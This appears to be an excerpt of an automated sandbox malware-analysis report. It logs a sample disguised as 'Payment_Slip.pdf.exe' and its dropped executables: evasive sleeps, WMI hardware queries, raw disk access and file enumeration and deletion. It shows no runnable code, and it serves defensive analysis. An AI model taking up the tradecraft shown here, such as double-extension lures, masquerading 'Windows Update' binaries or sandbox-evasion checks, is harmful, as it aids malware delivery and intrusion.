Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	API coverage: 4.6 %

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 8080	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764	Thread sleep count: 209 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764	Thread sleep time: -104500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292	Thread sleep count: 1007 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292	Thread sleep time: -3021000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292	Thread sleep count: 8521 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292	Thread sleep time: -25563000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe TID: 7876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7712	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8004	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -1199765s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -1199655s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -1199546s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -1199437s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599644s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599441s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599263s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599155s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598710s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598484s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598375s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598265s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -598043s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597718s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597390s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597168s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -597051s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595750s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\conserver.exe TID: 7888	Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424	Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428	Thread sleep count: 3777 > 30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428	Thread sleep count: 6042 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -1199758s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -1199631s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -1199380s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -1199078s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599869s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599764s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598999s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598889s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598669s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -598012s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -597796s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -597397s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -597171s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596952s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596843s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596624s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -596077s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595749s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595421s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595202s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -595041s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -594935s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -594820s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592	Thread sleep time: -594718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8700	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892	Thread sleep count: 5278 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -1199890s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8892	Thread sleep count: 4521 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -1199781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -1199672s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -1199530s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598662s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598531s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598422s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598124s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597468s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597358s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597140s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -597029s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596921s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596593s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -596046s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -595827s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -595714s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -595588s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8904	Thread sleep time: -595250s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041A01B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040B28E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0040838E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_004087A0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_00407848
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004068CD FindFirstFileW,FindNextFileW,	11_2_004068CD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0044BA59 FindFirstFileExA,	11_2_0044BA59
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00417AAB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040AC78
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,	14_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407C87
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_0041A01B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	17_2_0040B28E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_0040838E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_004087A0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00407848
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004068CD FindFirstFileW,FindNextFileW,	17_2_004068CD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0044BA59 FindFirstFileExA,	17_2_0044BA59
